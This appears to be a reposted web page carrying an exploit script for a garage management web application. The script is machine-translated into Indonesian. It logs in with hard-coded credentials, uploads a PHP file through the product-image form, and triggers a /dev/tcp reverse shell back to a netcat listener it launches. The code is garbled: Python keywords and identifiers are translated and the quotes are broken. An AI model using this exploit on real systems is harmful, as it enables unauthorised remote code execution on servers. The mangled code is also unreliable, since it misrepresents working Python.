Sistem Manajemen Garasi 1.0 Unggah Shell

  • Whatsapp
Auerswald COMpact 8.0B Backdoors
Auerswald COMpact B Backdoors

News.nextcloud.asia

# Judul Eksploitasi: Eksekusi Kode Jarak Jauh Sistem Manajemen Garasi melalui Unggah File
# Tanggal: 24/07/2022
# Eksploitasi Penulis: saitamang
# Beranda Vendor: https://www.sourcecoster.com
# Tautan Perangkat Lunak: https://www.sourcecoster.com/sites/default/files/download/mayuri_k/garage.zip
# Versi: 1.0
# Diuji pada: Centos 7 + MySQL

permintaan impor, subproses, string, sys, peringatan, waktu, bersamaan.futures
dari request.packages.urllib3.exceptions impor InsecureRequestWarning
warnings.simplefilter(‘ignore’,InsecureRequestWarning)
dari antarmuka impor netifaces, ifaddresses, AF_INET

req = permintaan.Sesi()

proxy = {
‘http’:’http://127.0.0.1:8080′,
‘https’:’http://127.0.0.1:8080′,
}

def login (ip, nama pengguna, kata sandi):
target = “http://%s/garage/garage/login.php” %ip
data = {‘namapengguna’:namapengguna,’sandi’:sandi, ‘masuk’:”}
respon = req.post(target, data=data)

jika ‘Login Berhasil’ di response.text:
mencetak(“[$] Sukses Masuk :)”)
trigger_rce(permintaan)
kalau tidak:
mencetak(“[$] Gagal Masuk :(“)

def createa_rs():
untuk ifaceName di interfaces():
alamat = [i[‘addr’] untuk saya di ifaddresses(ifaceName).setdefault(AF_INET, [{‘addr’:’No IP addr’}] )]
if ifaceName=”eth0″:
ipadd = ‘ ‘.join(alamat)
f = buka(“saitamang.php”, “w”)
payload = “& /dev/tcp/”+str(ipadd)+”/1234 0>&1’\”)?>”
f.tulis (muatan)
f.tutup()
kalau tidak:
lulus

def trigger_rce(permintaan):
buat_rs()
target = “http://%s/garage/garage/php_action/createProduct.php” %ip

multipart_form_data = {
“tanggal_sekarang”: (Tidak ada,””),
“productImage”: (“saitamang.php”, buka(“saitamang.php”, “rb”)),
“productName” : (Tidak ada,”test”),
“kuantitas” : (Tidak ada,”1″),
“nilai” : (Tidak ada,”1″),
“brandName” : (Tidak ada,”1″),
“categoryName” : (Tidak ada,”1″),
“productStatus” : (Tidak ada,”1″),
“buat” : (Tidak ada,””)
}

respon = req.post(target, files=multipart_form_data)

mencetak(“[$] Nikmati RCE Anda :)”)
req.get(“http://%s/garage/garage/assets/myimages/saitamang.php” %ip)

jika __name__ == “__main__”:
print(“_____ _ __”)
print(” / _/____ _(_) /_____ _____ ___ ____ _____ ____ _”)
print(” \__ \/ __ `/ / __/ __ `/ __ `__ \/ __ `/ __ \/ __ `/”)
print(” _/ / /_/ / / /_/ /_/ / / / / / /_/ / / / /_/ / “)
print(“/____/\__,_/_/\__/\__,_/_/ /_/ /_/\__,_/_/ /_/\__, / “)
print(” /____/ \n\n”)

mencoba:
ip = sys.argv[1].mengupas()

nama pengguna = “[email protected]”
kata sandi = “rootadmin”

subproses.panggilan([‘terminator’, ‘-e’, ‘nc -lvp 1234’])
waktu.tidur(2)
login (ip, nama pengguna, kata sandi)

kecuali IndexError:
mencetak(“[-] Penggunaan %s ” % sys.argv[0])
mencetak(“[-] Contoh: %s 192.168.100.x” % sys.argv[0])
sys.keluar(-1)

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.